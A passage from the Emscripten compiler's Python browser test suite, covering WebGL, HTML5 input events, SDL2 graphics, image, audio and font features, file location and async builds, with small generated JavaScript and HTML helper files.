self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(path_from_root('tests', 'glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-s', 'LEGACY_GL_EMULATION=1', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_test_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js', '-o', 'test.html'], expected='1')
@requires_threads
def test_html5(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
print(opts)
self.btest(path_from_root('tests', 'test_gamepad.c'), args=['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1'] + opts, expected='0')
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'], expected='0')
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure', '1'], ['-s', 'FULL_ES2=1'], ['-s', 'USE_PTHREADS=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_create_context.cpp'), args=opts + ['-lGL'], expected='0')
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest(path_from_root('tests', 'webgl_create_context2.cpp'), args=['--shell-file', path_from_root('tests', 'webgl_create_context2_shell.html'), '-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_destroy_context.cpp'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '--shell-file', path_from_root('tests/webgl_destroy_context_shell.html'), '-lGL'], expected='0')
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest(path_from_root('tests', 'webgl_color_buffer_readpixels.cpp'), args=['-lGL'], expected='0')
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
def test_webgl_shader_source_length(self):
for opts in [[], ['-s', 'FULL_ES2=1']]:
print(opts)
self.btest(path_from_root('tests', 'webgl_shader_source_length.cpp'), args=opts + ['-lGL'], expected='0')
def test_webgl2(self):
for opts in [
[],
['-O2', '-g1', '--closure', '1', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'],
['-s', 'FULL_ES2=1'],
]:
print(opts)
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'] + opts, expected='0')
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest(path_from_root('tests', 'webgl2.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL', '-s', 'USE_PTHREADS=1'], expected='0')
def test_webgl2_objects(self):
self.btest(path_from_root('tests', 'webgl2_objects.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_webgl2_ubos(self):
self.btest(path_from_root('tests', 'webgl2_ubos.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), args=['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1'], expected='1')
self.btest(path_from_root('tests', 'webgl2_garbage_free_entrypoints.cpp'), expected='1')
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest(path_from_root('tests', 'webgl2_backwards_compatibility_emulation.cpp'), args=['-s', 'USE_WEBGL2=1', '-s', 'WEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'], expected='0')
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest(path_from_root('tests', 'webgl_with_closure.cpp'), args=['-O2', '-s', 'USE_WEBGL2=1', '--closure', '1', '-lGL'], expected='0')
# Tests that -s GL_ASSERTIONS=1 and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest(path_from_root('tests', 'webgl2_draw_packed_triangle.c'), args=['-lGL', '-s', 'USE_WEBGL2=1', '-s', 'GL_ASSERTIONS=1'], expected='0')
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest(path_from_root('tests', 'webgl2_pbo.cpp'), args=['-s', 'USE_WEBGL2=1', '-lGL'], expected='0')
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_html5_mouse.c'), args=opts + ['-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
@no_wasm_backend('asm.js-specific')
def test_codemods(self):
# tests asm.js client-side code modifications
for opt_level in [0, 2]:
print('opt level', opt_level)
opts = ['-O' + str(opt_level), '-s', 'WASM=0']
# sanity checks, building with and without precise float semantics generates different results
self.btest(path_from_root('tests', 'codemods.cpp'), expected='2', args=opts)
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=1'])
self.btest(path_from_root('tests', 'codemods.cpp'), expected='1', args=opts + ['-s', 'PRECISE_F32=2', '--separate-asm']) # empty polyfill, but browser has support, so semantics are like float
def test_wget(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget.c'), expected='1', args=self.get_async_args())
def test_wget_data(self):
create_test_file('test.txt', 'emscripten')
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2'] + self.get_async_args())
# in the emterpreter, check the special assertions mode as well
if not self.is_wasm_backend():
self.btest(path_from_root('tests', 'test_wget_data.c'), expected='1', args=['-O2', '-g2', '-s', 'ASSERTIONS=1'] + self.get_async_args())
def test_locate_file(self):
for wasm in ([0, 1] if not self.is_wasm_backend() else [1]):
print('wasm', wasm)
self.clear()
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
int result = !strcmp("load me right before", buf);
printf("|%s| : %d\n", buf, result);
REPORT_RESULT(result);
return 0;
}
'''))
create_test_file('data.txt', 'load me right before...')
create_test_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
run_process([PYTHON, FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)])
os.mkdir('sub')
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
shutil.move('test.data', os.path.join('sub', 'test.data'))
self.run_browser('page.html', None, '/report_result?1')
# alternatively, put locateFile in the HTML
print('in html')
create_test_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected, args=[]):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'SAFE_HEAP=1', '-s', 'ASSERTIONS=1', '-s', 'FORCE_FILESYSTEM=1', '-s', 'WASM=' + str(wasm)] + args)
if wasm:
shutil.move('page.wasm', os.path.join('sub', 'page.wasm'))
else:
shutil.move('page.html.mem', os.path.join('sub', 'page.html.mem'))
self.run_browser('page.html', None, '/report_result?' + expected)
in_html('1')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_test_file('src.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
REPORT_RESULT(result);
return 0;
}
'''))
in_html('200')
@requires_graphics_hardware
def test_glfw3(self):
for opts in [[], ['-s', 'LEGACY_GL_EMULATION=1'], ['-Os', '--closure', '1']]:
print(opts)
self.btest(path_from_root('tests', 'glfw3.c'), args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'] + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(path_from_root('tests', 'glfw_events.c'), args=['-s', 'USE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@no_wasm_backend('asm.js')
def test_asm_swapping(self):
self.clear()
create_test_file('run.js', r'''
Module['onRuntimeInitialized'] = function() {
// test proper initial result
var result = Module._func();
console.log('first: ' + result);
if (result !== 10) throw 'bad first result';
// load second module to be swapped in
var second = document.createElement('script');
second.onload = function() { console.log('loaded second') };
second.src = 'second.js';
document.body.appendChild(second);
console.log('second appended');
Module['onAsmSwap'] = function() {
console.log('swapped');
// verify swapped-in result
var result = Module._func();
console.log('second: ' + result);
if (result !== 22) throw 'bad second result';
Module._report(999);
console.log('reported');
};
};
''')
for opts in [[], ['-O1'], ['-O2', '-profiling'], ['-O2']]:
print(opts)
opts += ['-s', 'WASM=0', '--pre-js', 'run.js', '-s', 'SWAPPABLE_ASM_MODULE=1'] # important that both modules are built with the same opts
create_test_file('second.cpp', self.with_report_result(open(path_from_root('tests', 'asm_swap2.cpp')).read()))
self.compile_btest(['second.cpp'] + opts)
run_process([PYTHON, path_from_root('tools', 'distill_asm.py'), 'a.out.js', 'second.js', 'swap-in'])
self.assertExists('second.js')
if SPIDERMONKEY_ENGINE in JS_ENGINES:
out = run_js('second.js', engine=SPIDERMONKEY_ENGINE, stderr=PIPE, full_output=True, assert_returncode=None)
self.validate_asmjs(out)
else:
print('Skipping asm validation check, spidermonkey is not configured')
self.btest(path_from_root('tests', 'asm_swap.cpp'), args=opts, expected='999')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
create_test_file('sdl2_image.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
'sdl2_image.c', '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpeg')
create_test_file('sdl2_image_jpeg.c', self.with_report_result(open(path_from_root('tests', 'sdl2_image.c')).read()))
self.compile_btest([
'sdl2_image_jpeg.c', '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-s', 'SDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
for defines in [[]]:
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
create_test_file('sdl2_key.c', self.with_report_result(open(path_from_root('tests', 'sdl2_key.c')).read()))
self.compile_btest(['sdl2_key.c', '-o', 'page.html'] + defines + ['-s', 'USE_SDL=2', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']'''])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl2_text.c', self.with_report_result(open(path_from_root('tests', 'sdl2_text.c')).read()))
self.compile_btest(['sdl2_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl2_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl2_mouse.c')).read()))
self.compile_btest(['sdl2_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify', '0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-s', 'USE_PTHREADS=1', '-s', 'USE_SDL=2', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '--closure', '1', '-g1', '-s', 'LEGACY_GL_EMULATION=1'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-s', 'USE_SDL=2', '-O2', '-s', 'LEGACY_GL_EMULATION=1'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_test_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_test_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_test_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-s', 'USE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-s', 'USE_SDL=2', '-s', 'TOTAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
create_test_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-s', 'USE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-s', 'GL_TESTING=1'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_test_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-s', 'USE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-s', 'USE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
create_test_file('sdl2_gl_read.c', self.with_report_result(open(path_from_root('tests', 'sdl2_gl_read.c')).read()))
self.compile_btest(['sdl2_gl_read.c', '-o', 'something.html', '-s', 'USE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-s', 'USE_SDL=2', '-s', 'USE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-s', 'USE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-s', 'USE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = open('test.html').read()
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_test_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-s', 'USE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(path_from_root('tests', 'freetype', 'LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-s', 'USE_SDL=2', '-s', 'USE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(path_from_root('tests', 'cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-s', 'USE_SDL=2'])
def test_sdl2_misc(self):
self.btest('sdl2_misc.c', expected='1', args=['-s', 'USE_SDL=2'])
print('also test building to object files first')
src = open(path_from_root('tests', 'sdl2_misc.c')).read()
create_test_file('test.c', self.with_report_result(src))
run_process([PYTHON, EMCC, 'test.c', '-s', 'USE_SDL=2', '-o', 'test.o'])
self.compile_btest(['test.o', '-s', 'USE_SDL=2', '-o', 'test.html'])
self.run_browser('test.html', '...', '/report_result?1')
@requires_sound_hardware
def test_sdl2_mixer(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'alarmvictory_1.ogg'), 'sound.ogg')
self.btest('sdl2_mixer.c', expected='1', args=['--preload-file', 'sound.ogg', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@requires_sound_hardware
def test_sdl2_mixer_wav(self):
shutil.copyfile(path_from_root('tests', 'sounds', 'the_entertainer.wav'), 'sound.wav')
self.btest('sdl2_mixer_wav.c', expected='1', args=['--preload-file', 'sound.wav', '-s', 'USE_SDL=2', '-s', 'USE_SDL_MIXER=2', '-s', 'TOTAL_MEMORY=33554432'])
@no_wasm_backend('cocos2d needs to be ported')
@requires_graphics_hardware
def test_cocos2d_hello(self):
cocos2d_root = os.path.join(system_libs.Ports.get_build_dir(), 'cocos2d')
preload_file = os.path.join(cocos2d_root, 'samples', 'HelloCpp', 'Resources') + '@'
self.btest('cocos2d_hello.cpp', reference='cocos2d_hello.png', reference_slack=1,
args=['-s', 'USE_COCOS2D=3', '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=0', '--std=c++11', '--preload-file', preload_file, '--use-preload-plugins'],
message='You should see Cocos2d logo')
def test_async(self):
for opts in [0, 1, 2, 3]:
print(opts)
self.btest('browser/async.cpp', '1', args=['-O' + str(opts), '-g2'] + self.get_async_args())
@no_fastcomp('emterpretify is not compatible with threads')
@requires_threads
def test_async_in_pthread(self):
self.btest('browser/async.cpp', '1', args=self.get_async_args() + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-g'])
def test_async_2(self):
